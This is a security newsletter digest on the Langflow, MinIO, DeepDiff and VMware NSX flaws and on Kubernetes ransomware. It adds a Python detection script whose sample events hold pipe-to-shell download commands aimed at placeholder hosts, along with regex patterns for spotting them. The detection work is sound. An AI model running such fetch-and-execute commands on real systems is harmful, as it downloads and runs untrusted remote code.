Another week of open-source tools handing out admin rights and hypervisors deciding your network traffic is optional.
Langflow RCE
Authenticated attackers can bypass lazy path validation in the Langflow v2 API to write arbitrary files anywhere on the host. It's a trivial path to host RCE. Patch or choke off v2 API access before someone pivots into your network.
MinIO Admin Hijack
MinIO shipped a critical JWT algorithm confusion bug in its OIDC setup. Anyone with a leaked `ClientSecret` can forge tokens and grant themselves `consoleAdmin`. Patch MinIO and rotate OIDC secrets before your storage gets owned.
42 Bytes to OOM
A botched patch left DeepDiff's restricted unpickler open to a class-filter bypass. A crafted 42-byte payload forces a 10GB memory allocation, triggering an instant OOM kill. This leaves platforms like AWS SageMaker wide open to a hilariously cheap DoS. Pin DeepDiff to 8.6.2 immediately.
K8s Ransomware
TeamPCP is hunting Kubernetes clusters with container-specific ransomware. They rely on basic pipe-to-shell (curl/wget) for initial access, then abuse native K8s features to move laterally and detonate. Alert on interactive shell pipes and audit clusters before production gets encrypted.
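The alerting rule this item recommends, as an added example that is not part of the newsletter or any vendor's product: it scans exec events for a download tool piped (or process-substituted) into a shell, and marks hits that ran on a TTY as hands-on-keyboard. The event field names, sample pods and rule names are assumptions, and the event lines are constructed.

```python
import json
import re

# Constructed sample exec events, one JSON object per line, in the shape a
# container-runtime exec probe might emit. Field names are assumptions.
SAMPLE_EVENTS = """\
{"pod":"web-7f9c","container":"app","comm":"bash","cmdline":"bash -c 'curl -fsSL http://203.0.113.10/x.sh | sh'","tty":false}
{"pod":"ci-runner-2","container":"runner","comm":"sh","cmdline":"sh -c 'wget -qO- https://example.invalid/i.sh | bash -s -- --yes'","tty":true}
{"pod":"web-7f9c","container":"app","comm":"curl","cmdline":"curl -s https://api.example.invalid/health","tty":false}
{"pod":"db-0","container":"postgres","comm":"bash","cmdline":"bash -c 'cat /etc/os-release | grep ID'","tty":true}
{"pod":"tools","container":"ops","comm":"bash","cmdline":"bash <(curl -s http://203.0.113.10/x.sh)","tty":true}
"""

# A downloader invocation up to (but not across) the next pipe or command separator.
DOWNLOADER = r"\b(?:curl|wget)\b[^|;&]*?"
# A shell, optionally behind sudo/env, as the consumer of the download.
SHELL = r"\b(?:sudo\s+)?(?:env\s+)?(?:ba|da|z|k)?sh\b"
PIPE_TO_SHELL = re.compile(DOWNLOADER + r"\|\s*" + SHELL)
PROC_SUBST = re.compile(SHELL + r"\s+<\(\s*" + DOWNLOADER + r"\)")


def scan_events(lines):
    """Return one finding per event whose command line feeds a download into a shell."""
    findings = []
    for raw in lines.splitlines():
        if not raw.strip():
            continue
        ev = json.loads(raw)
        cmd = ev.get("cmdline", "")
        rule = None
        if PIPE_TO_SHELL.search(cmd):
            rule = "pipe_to_shell"
        elif PROC_SUBST.search(cmd):
            rule = "process_substitution"
        if rule is None:
            continue
        interactive = bool(ev.get("tty"))
        findings.append({
            "pod": ev.get("pod"),
            "container": ev.get("container"),
            "rule": rule,
            "interactive": interactive,
            # A TTY means someone is typing inside the pod; non-TTY hits may be
            # build automation and still deserve review, so both are reported.
            "severity": "high" if interactive else "medium",
            "cmdline": cmd,
        })
    return findings
```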
VMware NSX Blackhole
If pod routing randomly breaks across subnets, blame the infrastructure. VMware NSX deep packet inspection is silently dropping valid VXLAN traffic on UDP port 8472. This self-inflicted DoS will burn days of troubleshooting. Swap your K8s CNI backend to WireGuard, or move VXLAN traffic off the standard port to bypass NSX entirely.